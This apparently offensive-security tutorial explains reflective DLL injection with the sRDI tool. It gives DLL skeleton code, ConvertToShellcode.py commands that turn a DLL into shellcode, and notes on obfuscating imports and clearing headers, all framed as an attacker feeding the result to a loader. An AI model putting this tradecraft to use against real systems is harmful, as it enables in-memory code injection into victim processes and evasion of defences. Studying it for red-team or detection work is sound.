Reflective DLL injection is a technique that allows an attacker to inject a DLL’s into a victim process from memory rather than disk.
When a PE file is loaded into memory, it expects to be loaded at a specific base address, which is usually the address it was linked to during the compilation process. However, due to various reasons like address space conflicts or dynamic loading, the actual base address might be different. This requires the PE file to be relocated, which involves modifying certain memory references to adjust for the new base address. The technique consist in load the dll in memory and rellocate it in order to the process loads it.
Shellcode Reflective DLL Injection as known as sRDI is a project from mogoxgas.
Remember the DLL to inject should have an exported function.
extern "C" __declspec(dllexport) void Go(void) {
[...OUR CODE...]
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
We can use the python script from the repository to convert the dll into a reflective dll shellcode.
python ConvertToShellcode.py -f FunctionName mydll.dll
python ConvertToShellcode.py -c -i -f FunctionName mydll.dll
python ConvertToShellcode.py -c -i mydll.dll
If we don’t want to specify a function name we need to call the functions in DllMain:
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD dwReason, LPVOID reserved) {
switch (dwReason) {
case DLL_PROCESS_ATTACH:
myAttach();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
myDetach();
break;
}
return TRUE;
}
Note: sRDI has implemented some functionalities to obfuscate imports by randomizing the import dependency load order and can also clear headers.
Our final loader has a normal behaviour, but instead of using the shellcode of calc.exe we need to use the shellcode that comes from the sRDI project.